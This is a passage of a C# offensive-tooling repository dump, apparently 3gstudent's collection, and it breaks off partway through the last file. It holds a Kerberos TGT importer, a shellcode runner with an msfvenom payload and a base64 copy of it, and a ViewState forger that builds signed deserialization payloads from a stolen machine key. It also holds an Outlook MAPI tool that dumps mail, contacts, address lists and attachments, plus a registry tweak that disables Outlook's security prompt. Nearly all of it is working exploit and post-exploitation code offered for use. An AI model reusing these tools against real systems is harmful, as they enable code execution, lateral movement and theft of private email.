| } 96 | } 97 | 98 | public static void ShowUsage() 99 | { 100 | string Usage = @" 101 | Use to import the TGT 102 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 103 | Usage: 104 | 105 | eg. 106 | SharpTGTImporter.exe 1.kirbi 107 | 108 | Complie: 109 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpTGTImporter.cs 110 | or 111 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpTGTImporter.cs 112 | "; 113 | Console.WriteLine(Usage); 114 | } 115 | 116 | static void Main(string[] args) 117 | { 118 | if (args.Length != 1) 119 | { 120 | ShowUsage(); 121 | System.Environment.Exit(0); 122 | } 123 | try 124 | { 125 | TGTImporter importer1 = new TGTImporter(); 126 | byte[] ticket = File.ReadAllBytes(args[0]); 127 | ImportTGT(ticket); 128 | } 129 | catch (Exception e) 130 | { 131 | Console.WriteLine("[!] ERROR: {0}", e.Message); 132 | } 133 | } 134 | } 135 | } 136 | -------------------------------------------------------------------------------- /Shellcode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | namespace RunShellcode 4 | { 5 | class Program 6 | { 7 | static void Main(string[] args) 8 | { 9 | //msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp 10 | byte[] shellcode64 = new byte[276] { 11 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 12 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 13 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 14 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 15 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 16 | 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 17 | 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 18 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 19 | 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 20 | 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 21 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 22 | 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 23 | 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 24 | 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 25 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 26 | 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 27 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 28 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 29 | 0x63,0x2e,0x65,0x78,0x65,0x00 }; 30 | 31 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode64.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | Marshal.Copy(shellcode64, 0, (IntPtr)(funcAddr), shellcode64.Length); 33 | IntPtr hThread = IntPtr.Zero; 34 | UInt32 threadId = 0; 35 | IntPtr pinfo = IntPtr.Zero; 36 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 37 | WaitForSingleObject(hThread, 0xFFFFFFFF); 38 | } 39 | private static UInt32 MEM_COMMIT = 0x1000; 40 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 41 | [DllImport("kernel32")] 42 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 43 | [DllImport("kernel32")] 44 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 45 | [DllImport("kernel32")] 46 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /ShellcodeBase64.txt: -------------------------------------------------------------------------------- 1 | /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA 2 | -------------------------------------------------------------------------------- /SqlClient.cs: -------------------------------------------------------------------------------- 1 | //From:https://github.com/FortyNorthSecurity/SqlClient 2 | using System; 3 | using System.Data.SqlClient; 4 | using System.Collections.Generic; 5 | using System.Linq; 6 | using System.Text; 7 | 8 | namespace SqlClient 9 | { 10 | class Program 11 | { 12 | static void Main(string[] args) 13 | { 14 | if (args.Length != 5) 15 | { 16 | Console.WriteLine("[*]ERROR: Please provide the correct number of arguments!"); 17 | Console.WriteLine("[*]Ex: SqlClient.exe "); 18 | return; 19 | } 20 | string connString = @"Server=" + args[2] + ";Database=" + args[3] + ";User ID=" + args[0] + ";Password=" + args[1]; 21 | 22 | try 23 | { 24 | using (SqlConnection conn = new SqlConnection(connString)) 25 | { 26 | //retrieve the SQL Server instance version 27 | string query = args[4]; 28 | 29 | SqlCommand cmd = new SqlCommand(query, conn); 30 | 31 | //open connection 32 | conn.Open(); 33 | 34 | //execute the SQLCommand 35 | SqlDataReader dr = cmd.ExecuteReader(); 36 | 37 | //check if there are records 38 | if (dr.HasRows) 39 | { 40 | while (dr.Read()) 41 | { 42 | //display retrieved record (first column only/string value) 43 | for (int i = 0; i < dr.FieldCount; i++) 44 | { 45 | Console.WriteLine(dr.GetName(i)); 46 | } 47 | for (int i = 0; i < dr.FieldCount; i++) 48 | { 49 | Console.WriteLine(dr.GetValue(i)); 50 | } 51 | } 52 | } 53 | else 54 | { 55 | Console.WriteLine("No data found."); 56 | } 57 | dr.Close(); 58 | } 59 | } 60 | catch (Exception ex) 61 | { 62 | //display error message 63 | Console.WriteLine("Exception: " + ex.Message); 64 | } 65 | } 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /XamlToViewState.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Runtime.Serialization; 6 | using System.Globalization; 7 | using System.Runtime.Serialization.Formatters.Binary; 8 | using System.Reflection; 9 | 10 | namespace XamlToViewState 11 | { 12 | [Serializable] 13 | public class TextFormattingRunPropertiesMarshal : ISerializable 14 | { 15 | protected TextFormattingRunPropertiesMarshal(SerializationInfo info, StreamingContext context) { } 16 | string _xaml; 17 | public void GetObjectData(SerializationInfo info, StreamingContext context) 18 | { 19 | Assembly assembly = Assembly.LoadFrom("Microsoft.PowerShell.Editor.dll"); 20 | info.SetType(assembly.GetType("Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties")); 21 | info.AddValue("ForegroundBrush", _xaml); 22 | } 23 | public TextFormattingRunPropertiesMarshal(string xaml) 24 | { 25 | _xaml = xaml; 26 | } 27 | } 28 | 29 | public class Program 30 | { 31 | public static void ShowUsage() 32 | { 33 | string Usage = @" 34 | Use to create viewstate from XAML file 35 | Usage: 36 | 37 | 38 | eg. 39 | XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF 40 | "; 41 | Console.WriteLine(Usage); 42 | } 43 | 44 | static byte[] strToToHexByte(string hexString) 45 | { 46 | if ((hexString.Length % 2) != 0) 47 | hexString += " "; 48 | byte[] returnBytes = new byte[hexString.Length / 2]; 49 | for (int i = 0; i < returnBytes.Length; i++) 50 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 51 | return returnBytes; 52 | } 53 | static string CreateViewState(byte[] dat,string generator,string key) 54 | { 55 | MemoryStream ms = new MemoryStream(); 56 | ms.WriteByte(0xff); 57 | ms.WriteByte(0x01); 58 | ms.WriteByte(0x32); 59 | uint num = (uint)dat.Length; 60 | while (num >= 0x80) 61 | { 62 | ms.WriteByte((byte)(num | 0x80)); 63 | num = num >> 0x7; 64 | } 65 | ms.WriteByte((byte)num); 66 | ms.Write(dat, 0, dat.Length); 67 | byte[] data = ms.ToArray(); 68 | 69 | byte[] validationKey= strToToHexByte(key); 70 | 71 | uint _clientstateid = 0; 72 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 73 | { 74 | System.Environment.Exit(0); 75 | } 76 | 77 | byte[] _mackey = new byte[4]; 78 | _mackey[0] = (byte)_clientstateid; 79 | _mackey[1] = (byte)(_clientstateid >> 8); 80 | _mackey[2] = (byte)(_clientstateid >> 16); 81 | _mackey[3] = (byte)(_clientstateid >> 24); 82 | 83 | ms = new MemoryStream(); 84 | ms.Write(data,0,data.Length); 85 | ms.Write(_mackey,0,_mackey.Length); 86 | byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 87 | ms=new MemoryStream(); 88 | ms.Write(data,0,data.Length); 89 | ms.Write(hash,0,hash.Length); 90 | return Convert.ToBase64String(ms.ToArray()); 91 | } 92 | static byte[] Serialize(object obj) 93 | { 94 | using (MemoryStream mem = new MemoryStream()) 95 | { 96 | BinaryFormatter bf = new BinaryFormatter(); 97 | bf.Serialize(mem, obj); 98 | return mem.ToArray(); 99 | } 100 | } 101 | public static void Run(String xaml, String generator, String key) 102 | { 103 | string data = CreateViewState(Serialize(new TextFormattingRunPropertiesMarshal(File.ReadAllText(xaml))),generator,key); 104 | Console.WriteLine("__VIEWSTATE="); 105 | Console.WriteLine(data); 106 | } 107 | 108 | static void Main(string[] args) 109 | { 110 | if(args.Length!=3) 111 | { 112 | ShowUsage(); 113 | System.Environment.Exit(0); 114 | } 115 | try 116 | { 117 | Run(args[0], args[1], args[2]); 118 | } 119 | catch (Exception e) 120 | { 121 | Console.WriteLine("{0}", e.Message); 122 | System.Environment.Exit(0); 123 | } 124 | } 125 | } 126 | } 127 | -------------------------------------------------------------------------------- /mapi_tool.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using Microsoft.Office.Interop.Outlook; 3 | 4 | namespace MAPI_TOOL 5 | { 6 | class Program 7 | { 8 | private static void ListMail(Microsoft.Office.Interop.Outlook.NameSpace ns,String folder,String mode) 9 | { 10 | Console.WriteLine("[*] Try to list mail"); 11 | Console.WriteLine("[*] Folder:" + folder); 12 | Console.WriteLine("[*] Mode:" + mode); 13 | Console.WriteLine(); 14 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 15 | if (folder == "Inbox") 16 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 17 | else if(folder == "Drafts") 18 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 19 | else if (folder == "SentItems") 20 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 21 | else if (folder == "DeletedItems") 22 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 23 | else if (folder == "Outbox") 24 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 25 | else if (folder == "JunkEmail") 26 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 27 | else 28 | { 29 | Console.WriteLine("[!] The folder is not supported yet.\r\n"); 30 | return; 31 | } 32 | Microsoft.Office.Interop.Outlook.Items items = mapifolder.Items; 33 | Console.WriteLine("[+] Folder size:" + mapifolder.Items.Count + "\r\n"); 34 | if (mode == "all") 35 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 36 | foreach (var item in items) 37 | { 38 | var mail = item as Microsoft.Office.Interop.Outlook.MailItem; 39 | 40 | if (mail != null) 41 | { 42 | if (mail.UnRead == true) 43 | Console.WriteLine("[+] UnRead Mail"); 44 | else 45 | Console.WriteLine("[+] Mail"); 46 | if (mode == "short") 47 | { 48 | Console.WriteLine("Subject:" + mail.Subject); 49 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 50 | if (mail.Attachments.Count > 0) 51 | { 52 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 53 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 54 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 55 | { 56 | Console.WriteLine(" Name:" + att.FileName); 57 | } 58 | } 59 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 60 | Console.WriteLine("EntryID:" + mail.EntryID); 61 | Console.WriteLine(); 62 | continue; 63 | 64 | } 65 | else if(mode == "all") 66 | { 67 | Console.WriteLine("Subject:" + mail.Subject); 68 | Console.WriteLine("From:" + mail.SenderName); 69 | Console.WriteLine("To:" + mail.To); 70 | Console.WriteLine("CC:" + mail.CC); 71 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 72 | if (mail.Attachments.Count > 0) 73 | { 74 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 75 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 76 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 77 | { 78 | Console.WriteLine(" Name:" + att.FileName); 79 | } 80 | } 81 | Console.WriteLine("Body:\r\n" + mail.Body); 82 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 83 | Console.WriteLine("EntryID:" + mail.EntryID); 84 | Console.WriteLine(); 85 | } 86 | } 87 | } 88 | } 89 | 90 | private static void ListUnreadMail(Microsoft.Office.Interop.Outlook.NameSpace ns, String folder, String mode) 91 | { 92 | Console.WriteLine("[*] Try to list unread mail"); 93 | Console.WriteLine("[*] Folder:" + folder); 94 | Console.WriteLine("[*] Mode:" + mode); 95 | Console.WriteLine(); 96 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 97 | if (folder == "Inbox") 98 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 99 | else if (folder == "Drafts") 100 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 101 | else if (folder == "SentItems") 102 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 103 | else if (folder == "DeletedItems") 104 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 105 | else if (folder == "Outbox") 106 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 107 | else if (folder == "JunkEmail") 108 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 109 | else 110 | { 111 | Console.WriteLine("[!] The folder is not supported yet.\r\n"); 112 | return; 113 | } 114 | Microsoft.Office.Interop.Outlook.Items items = mapifolder.Items; 115 | Console.WriteLine("[+] Folder size:" + mapifolder.Items.Count + "\r\n"); 116 | 117 | if (mode == "all") 118 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 119 | 120 | foreach (var item in items) 121 | { 122 | var mail = item as Microsoft.Office.Interop.Outlook.MailItem; 123 | 124 | if (mail != null) 125 | { 126 | if (mail.UnRead == false) 127 | continue; 128 | else 129 | Console.WriteLine("[+] UnRead Mail"); 130 | if (mode == "short") 131 | { 132 | Console.WriteLine("Subject:" + mail.Subject); 133 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 134 | if (mail.Attachments.Count > 0) 135 | { 136 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 137 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 138 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 139 | { 140 | Console.WriteLine(" Name:" + att.FileName); 141 | } 142 | } 143 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 144 | Console.WriteLine("EntryID:" + mail.EntryID); 145 | Console.WriteLine(); 146 | continue; 147 | } 148 | else if (mode == "all") 149 | { 150 | Console.WriteLine("Subject:" + mail.Subject); 151 | Console.WriteLine("From:" + mail.SenderName); 152 | Console.WriteLine("To:" + mail.To); 153 | Console.WriteLine("CC:" + mail.CC); 154 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 155 | if (mail.Attachments.Count > 0) 156 | { 157 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 158 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 159 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 160 | { 161 | Console.WriteLine(" Name:" + att.FileName); 162 | } 163 | } 164 | Console.WriteLine("Body:\r\n" + mail.Body); 165 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 166 | Console.WriteLine("EntryID:" + mail.EntryID); 167 | Console.WriteLine(); 168 | } 169 | } 170 | } 171 | } 172 | 173 | private static void SaveAttachment(Microsoft.Office.Interop.Outlook.NameSpace ns, String folder, String EntryID) 174 | { 175 | Console.WriteLine("[*] Try to SaveAttachment"); 176 | Console.WriteLine("[*] Folder:" + folder); 177 | Console.WriteLine("[*] EntryID:" + EntryID); 178 | Console.WriteLine(); 179 | 180 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 181 | if (folder == "Inbox") 182 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 183 | else if (folder == "Drafts") 184 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 185 | else if (folder == "SentItems") 186 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 187 | else if (folder == "DeletedItems") 188 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 189 | else if (folder == "Outbox") 190 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 191 | else if (folder == "JunkEmail") 192 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 193 | else 194 | { 195 | Console.WriteLine("[!] The folder is not supported yet.\r\n"); 196 | return; 197 | } 198 | Microsoft.Office.Interop.Outlook.Items items = mapifolder.Items; 199 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 200 | 201 | foreach (var item in items) 202 | { 203 | var mail = item as Microsoft.Office.Interop.Outlook.MailItem; 204 | 205 | if (mail != null) 206 | { 207 | 208 | if (mail.EntryID == EntryID) 209 | { 210 | Console.WriteLine("[+] Catch the mail."); 211 | Console.WriteLine("Subject:" + mail.Subject); 212 | Console.WriteLine("From:" + mail.SenderName); 213 | Console.WriteLine("To:" + mail.To); 214 | Console.WriteLine("CC:" + mail.CC); 215 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 216 | if (mail.Attachments.Count > 0) 217 | { 218 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 219 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 220 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 221 | { 222 | Console.WriteLine(" Name:" + att.FileName); 223 | att.SaveAsFile(System.Environment.CurrentDirectory + "\\" + att.FileName); 224 | } 225 | } 226 | } 227 | } 228 | } 229 | } 230 | 231 | private static void GetConfig(Microsoft.Office.Interop.Outlook.NameSpace ns,String mode) 232 | { 233 | //Reference:https://github.com/n1nj4sec/pupy/blob/unstable/pupy/modules/outlook.py 234 | Console.WriteLine("[*] Try to get config"); 235 | Console.WriteLine(); 236 | Object CurrentProfileName = ns.GetType().InvokeMember("CurrentProfileName",System.Reflection.BindingFlags.GetProperty,null,ns,null); 237 | Console.WriteLine("[*] CurrentProfileName:" + CurrentProfileName.ToString()); 238 | 239 | Object ExchangeMailboxServerName = ns.GetType().InvokeMember("ExchangeMailboxServerName", System.Reflection.BindingFlags.GetProperty, null, ns, null); 240 | Console.WriteLine("[*] ExchangeMailboxServerName:" + ExchangeMailboxServerName.ToString()); 241 | 242 | Object ExchangeMailboxServerVersion = ns.GetType().InvokeMember("ExchangeMailboxServerVersion", System.Reflection.BindingFlags.GetProperty, null, ns, null); 243 | Console.WriteLine("[*] ExchangeMailboxServerVersion:" + ExchangeMailboxServerVersion.ToString()); 244 | if(mode =="all") 245 | { 246 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 247 | Console.WriteLine("[*] Account-DisplayName:" + ns.Accounts[1].DisplayName); 248 | Console.WriteLine("[*] Account-SmtpAddress:" + ns.Accounts[1].SmtpAddress); 249 | Console.WriteLine("[*] Account-AutoDiscoverXml:\r\n" + ns.Accounts[1].AutoDiscoverXml); 250 | Console.WriteLine("[*] Account-AccountType:" + ns.Accounts[1].AccountType); 251 | } 252 | } 253 | 254 | private static void GetGlobalAddress(Microsoft.Office.Interop.Outlook.NameSpace ns) 255 | { 256 | Console.WriteLine("[*] Try to get global address"); 257 | Console.WriteLine(); 258 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 259 | AddressList aL = ns.GetGlobalAddressList(); 260 | AddressEntries aEs = aL.AddressEntries; 261 | for (int i = 0; i < aEs.Count; i++) 262 | { 263 | Console.WriteLine(aEs[i+1].GetExchangeUser().PrimarySmtpAddress); 264 | } 265 | } 266 | 267 | private static void GetContacts(Microsoft.Office.Interop.Outlook.NameSpace ns) 268 | { 269 | Console.WriteLine("[*] Try to get contacts"); 270 | Console.WriteLine(); 271 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 272 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderContacts); 273 | for (int i= 0;i< mapifolder.Items.Count;i++) 274 | { 275 | ContactItem item = (Microsoft.Office.Interop.Outlook.ContactItem)mapifolder.Items[i+1]; 276 | Console.WriteLine(item.Email1Address); 277 | } 278 | } 279 | 280 | private static void GetAllFolders(Microsoft.Office.Interop.Outlook.NameSpace ns) 281 | { 282 | Console.WriteLine("[*] Try to get the size of all folders"); 283 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 284 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 285 | Console.WriteLine("Inbox: " + mapifolder.Items.Count); 286 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 287 | Console.WriteLine("Drafts: " + mapifolder.Items.Count); 288 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 289 | Console.WriteLine("SentItems: " + mapifolder.Items.Count); 290 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 291 | Console.WriteLine("DeletedItems: " + mapifolder.Items.Count); 292 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 293 | Console.WriteLine("Outbox: " + mapifolder.Items.Count); 294 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 295 | Console.WriteLine("JunkEmail: " + mapifolder.Items.Count); 296 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderCalendar); 297 | Console.WriteLine("Calendar: " + mapifolder.Items.Count); 298 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderContacts); 299 | Console.WriteLine("Contacts: " + mapifolder.Items.Count); 300 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJournal); 301 | Console.WriteLine("Journal: " + mapifolder.Items.Count); 302 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderNotes); 303 | Console.WriteLine("Notes: " + mapifolder.Items.Count); 304 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderTasks); 305 | Console.WriteLine("Tasks: " + mapifolder.Items.Count); 306 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderConflicts); 307 | Console.WriteLine("Conflicts: " + mapifolder.Items.Count); 308 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSyncIssues); 309 | Console.WriteLine("SyncIssues: " + mapifolder.Items.Count); 310 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderLocalFailures); 311 | Console.WriteLine("LocalFailures: " + mapifolder.Items.Count); 312 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderServerFailures); 313 | Console.WriteLine("ServerFailures: " + mapifolder.Items.Count); 314 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderRssFeeds); 315 | Console.WriteLine("RssFeeds: " + mapifolder.Items.Count); 316 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderToDo); 317 | Console.WriteLine("ToDo: " + mapifolder.Items.Count); 318 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSuggestedContacts); 319 | Console.WriteLine("SuggestedContacts: " + mapifolder.Items.Count); 320 | } 321 | 322 | 323 | static void ShowUsage() 324 | { 325 | 326 | string Usage = @" 327 | Use MAPI to manage Outlook. 328 | Author:3gstudent 329 | Complie: 330 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll 331 | or 332 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll 333 | 334 | Usage: 335 | mapi_tool.exe GetAllFolders 336 | mapi_tool.exe GetConfig 337 | mapi_tool.exe ListMail 338 | mapi_tool.exe ListUnreadMail 339 | 340 | Ex command: 341 | mapi_tool.exe GetConfigEx 342 | mapi_tool.exe GetContactsEx 343 | mapi_tool.exe GetGlobalAddressEx 344 | mapi_tool.exe ListMailEx 345 | mapi_tool.exe ListUnreadMailEx 346 | mapi_tool.exe SaveAttachment 347 | 348 | :Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail 349 | 350 | Note: 351 | When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt. 352 | You can modify the registry to turn off the Outlook security prompt. 353 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2 354 | 355 | "; 356 | Console.WriteLine(Usage); 357 | } 358 | static void Main(string[] args) 359 | { 360 | Microsoft.Office.Interop.Outlook.Application app = new Microsoft.Office.Interop.Outlook.Application(); 361 | Microsoft.Office.Interop.Outlook.NameSpace ns = app.GetNamespace("MAPI"); 362 | 363 | try 364 | { 365 | if (args.Length == 1) 366 | { 367 | if (args[0] == "GetAllFolders") 368 | GetAllFolders(ns); 369 | else if (args[0] == "GetGlobalAddressEx") 370 | GetGlobalAddress(ns); 371 | else if (args[0] == "GetContactsEx") 372 | GetContacts(ns); 373 | else if (args[0] == "GetConfig") 374 | GetConfig(ns, "short"); 375 | else if (args[0] == "GetConfigEx") 376 | GetConfig(ns, "all"); 377 | else 378 | Console.WriteLine("[!] Wrong parameter"); 379 | } 380 | else if (args.Length == 2) 381 | { 382 | if (args[0] == "ListMail") 383 | ListMail(ns, args[1], "short"); 384 | else if (args[0] == "ListUnreadMail") 385 | 